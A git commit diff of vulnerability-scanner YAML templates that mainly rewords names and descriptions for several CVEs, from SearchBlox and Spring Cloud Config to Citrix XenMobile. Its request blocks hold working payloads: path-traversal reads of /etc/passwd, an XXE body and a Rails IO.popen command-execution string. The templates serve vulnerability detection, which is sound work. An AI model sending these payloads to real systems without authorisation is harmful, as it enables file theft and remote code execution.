Merge pull request #4686 from MostInterestingBotInTheWorld/dashboard
Dashboard Content Enhancementspatch-1
commit
a359b681e1
|
@ -1,13 +1,14 @@
|
||||||
id: CVE-2020-35580
|
id: CVE-2020-35580
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: SearchBlox < 9.2.2 - Local File Inclusion (LFI)
|
name: SearchBlox <9.2.2 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
|
description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
|
||||||
reference:
|
reference:
|
||||||
- https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
|
- https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
|
||||||
- https://developer.searchblox.com/docs/getting-started-with-searchblox
|
- https://developer.searchblox.com/docs/getting-started-with-searchblox
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35580
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -22,6 +23,8 @@ requests:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
part: body
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,20 +1,20 @@
|
||||||
id: CVE-2020-35598
|
id: CVE-2020-35598
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Advanced Comment System 1.0 - Path Traversal
|
name: Advanced Comment System 1.0 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/49343
|
- https://www.exploit-db.com/exploits/49343
|
||||||
- https://www.cvedetails.com/cve/CVE-2020-35598
|
|
||||||
- https://seclists.org/fulldisclosure/2020/Dec/13
|
- https://seclists.org/fulldisclosure/2020/Dec/13
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35598
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2020-35598
|
cve-id: CVE-2020-35598
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi,acs
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -31,3 +31,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
id: CVE-2020-35736
|
id: CVE-2020-35736
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GateOne 1.1 - Arbitrary File Retrieval
|
name: GateOne 1.1 - Local File Inclusion
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. directory traversal because os.path.join is incorrectly used.
|
description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/liftoff/GateOne/issues/747
|
- https://github.com/liftoff/GateOne/issues/747
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
|
||||||
|
@ -30,3 +30,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
id: CVE-2020-35749
|
id: CVE-2020-35749
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated)
|
name: WordPress Simple Job Board <2.9.4 - Local File Inclusion
|
||||||
author: cckuailong
|
author: cckuailong
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
|
description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
||||||
|
@ -27,9 +27,11 @@ requests:
|
||||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -40,3 +42,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
id: CVE-2020-4463
|
id: CVE-2020-4463
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: IBM Maximo Asset Management Information Disclosure via XXE
|
name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
IBM Maximo Asset Management is vulnerable to an
|
IBM Maximo Asset Management is vulnerable to an
|
||||||
XML External Entity Injection (XXE) attack when processing XML data.
|
XML external entity injection (XXE) attack when processing XML data.
|
||||||
A remote attacker could exploit this vulnerability to expose
|
A remote attacker could exploit this vulnerability to expose
|
||||||
sensitive information or consume memory resources.
|
sensitive information or consume memory resources.
|
||||||
reference:
|
reference:
|
||||||
|
@ -14,6 +14,7 @@ info:
|
||||||
- https://github.com/Ibonok/CVE-2020-4463
|
- https://github.com/Ibonok/CVE-2020-4463
|
||||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
|
||||||
- https://www.ibm.com/support/pages/node/6253953
|
- https://www.ibm.com/support/pages/node/6253953
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-4463
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
|
||||||
cvss-score: 8.2
|
cvss-score: 8.2
|
||||||
|
@ -33,14 +34,19 @@ requests:
|
||||||
</max:QueryMXPERSON>
|
</max:QueryMXPERSON>
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/xml
|
Content-Type: application/xml
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
part: body
|
||||||
- "application/xml"
|
|
||||||
part: header
|
|
||||||
- type: word
|
|
||||||
words:
|
words:
|
||||||
- "QueryMXPERSONResponse"
|
- "QueryMXPERSONResponse"
|
||||||
- "MXPERSONSet"
|
- "MXPERSONSet"
|
||||||
part: body
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/xml"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,13 +1,13 @@
|
||||||
id: CVE-2020-5410
|
id: CVE-2020-5410
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Directory Traversal in Spring Cloud Config Server
|
name: Spring Cloud Config Server - Local File Inclusion
|
||||||
author: mavericknerd
|
author: mavericknerd
|
||||||
severity: high
|
severity: high
|
||||||
description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server
|
description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.
|
||||||
module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
|
|
||||||
reference:
|
reference:
|
||||||
- https://tanzu.vmware.com/security/cve-2020-5410
|
- https://tanzu.vmware.com/security/cve-2020-5410
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5410
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -19,12 +19,17 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: regex
|
|
||||||
regex:
|
# Enhanced by mp on 2022/06/28
|
||||||
- "root:.*:0:0:"
|
|
||||||
part: body
|
|
||||||
|
|
|
@ -1,12 +1,13 @@
|
||||||
id: CVE-2020-5776
|
id: CVE-2020-5776
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin
|
name: MAGMI - Cross-Site Request Forgery
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
|
description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2020-51
|
- https://www.tenable.com/security/research/tra-2020-51
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5776
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
|
@ -46,3 +47,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,21 +1,21 @@
|
||||||
id: CVE-2020-7943
|
id: CVE-2020-7943
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Puppet Server and PuppetDB sensitive information disclosure
|
name: Puppet Server/PuppetDB - Sensitive Information Disclosure
|
||||||
author: c-sh0
|
author: c-sh0
|
||||||
severity: high
|
severity: high
|
||||||
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
|
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.
|
||||||
reference:
|
reference:
|
||||||
- https://puppet.com/security/cve/CVE-2020-7943
|
- https://puppet.com/security/cve/CVE-2020-7943
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
|
|
||||||
- https://tickets.puppetlabs.com/browse/PDB-4876
|
- https://tickets.puppetlabs.com/browse/PDB-4876
|
||||||
- https://puppet.com/security/cve/CVE-2020-7943/
|
- https://puppet.com/security/cve/CVE-2020-7943/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2020-7943
|
cve-id: CVE-2020-7943
|
||||||
cwe-id: CWE-276
|
cwe-id: CWE-276
|
||||||
tags: cve,cve2020,puppet,exposure
|
tags: cve,cve2020,puppet,exposure,puppetdb
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -24,16 +24,18 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
- type: word
|
||||||
- 200
|
part: body
|
||||||
|
words:
|
||||||
|
- "trapperkeeper"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "application/json"
|
- "application/json"
|
||||||
|
|
||||||
- type: word
|
- type: status
|
||||||
part: body
|
status:
|
||||||
words:
|
- 200
|
||||||
- "trapperkeeper"
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -1,15 +1,16 @@
|
||||||
id: CVE-2020-8163
|
id: CVE-2020-8163
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Potential Remote Code Execution on Rails
|
name: Ruby on Rails <5.0.1 - Remote Code Execution
|
||||||
author: tim_koopmans
|
author: tim_koopmans
|
||||||
severity: high
|
severity: high
|
||||||
description: Tests for ability to pass user parameters as local variables into partials
|
description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.
|
||||||
reference:
|
reference:
|
||||||
- https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
|
- https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
|
||||||
- https://hackerone.com/reports/304805
|
- https://hackerone.com/reports/304805
|
||||||
- https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0
|
- https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0
|
||||||
- https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
|
- https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8163
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
|
@ -21,12 +22,17 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
|
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: regex
|
|
||||||
regex:
|
# Enhanced by mp on 2022/06/28
|
||||||
- "root:.*:0:0:"
|
|
||||||
part: body
|
|
||||||
|
|
|
@ -1,39 +1,40 @@
|
||||||
id: CVE-2020-8209
|
id: CVE-2020-8209
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Citrix XenMobile Server Path Traversal
|
name: Citrix XenMobile Server - Local File Inclusion
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Improper access control in Citrix XenMobile Server 10.12 before RP2,
|
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
|
||||||
Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10
|
|
||||||
before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
|
|
||||||
|
|
||||||
reference:
|
reference:
|
||||||
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
|
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
|
||||||
reference:
|
|
||||||
- https://support.citrix.com/article/CTX277457
|
- https://support.citrix.com/article/CTX277457
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2020-8209
|
cve-id: CVE-2020-8209
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2020,citrix,lfi
|
tags: cve,cve2020,citrix,lfi,xenmobile
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
part: body
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "fileDownload=true"
|
- "fileDownload=true"
|
||||||
- "application/octet-stream"
|
- "application/octet-stream"
|
||||||
- "attachment;"
|
- "attachment;"
|
||||||
condition: and
|
condition: and
|
||||||
part: header
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -4,17 +4,17 @@ info:
|
||||||
name: Lotus Core CMS 1.0.1 - Local File Inclusion
|
name: Lotus Core CMS 1.0.1 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter.
|
description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
|
|
||||||
- https://cxsecurity.com/issue/WLB-2020010234
|
- https://cxsecurity.com/issue/WLB-2020010234
|
||||||
- https://www.exploit-db.com/exploits/47985
|
- https://www.exploit-db.com/exploits/47985
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
cve-id: CVE-2020-8641
|
cve-id: CVE-2020-8641
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2020,lfi,lotus
|
tags: cve,cve2020,lfi,lotus,cms
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -31,3 +31,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/28
|
||||||
|
|
|
@ -31,7 +31,7 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<title>400 - Bad Request</title>"
|
- "<title>400 - Bad Request</title>"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -1,17 +1,16 @@
|
||||||
id: CVE-2021-32819
|
id: CVE-2021-32819
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Nodejs squirrelly template engine RCE
|
name: Nodejs Squirrelly - Remote Code Execution
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
|
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
|
||||||
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
|
|
||||||
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
|
|
||||||
reference:
|
reference:
|
||||||
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
||||||
- https://www.linuxlz.com/aqld/2331.html
|
- https://www.linuxlz.com/aqld/2331.html
|
||||||
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32819
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
|
@ -28,3 +27,5 @@ requests:
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,14 +1,15 @@
|
||||||
id: CVE-2021-32820
|
id: CVE-2021-32820
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Express-handlebars Path Traversal
|
name: Express-handlebars - Local File Inclusion
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: high
|
severity: high
|
||||||
description: Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
|
description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
|
||||||
reference:
|
reference:
|
||||||
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
||||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
||||||
- https://github.com/express-handlebars/express-handlebars/pull/163
|
- https://github.com/express-handlebars/express-handlebars/pull/163
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32820
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||||
cvss-score: 8.6
|
cvss-score: 8.6
|
||||||
|
@ -23,14 +24,16 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
- "daemon:[x*]:0:0:"
|
- "daemon:[x*]:0:0:"
|
||||||
- "operator:[x*]:0:0:"
|
- "operator:[x*]:0:0:"
|
||||||
part: body
|
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -4,12 +4,12 @@ info:
|
||||||
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
|
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: high
|
severity: high
|
||||||
description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
|
description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
|
|
||||||
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
|
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
|
||||||
- https://www.zyxel.com/us/en/support/security_advisories.shtml
|
- https://www.zyxel.com/us/en/support/security_advisories.shtml
|
||||||
- https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
|
- https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
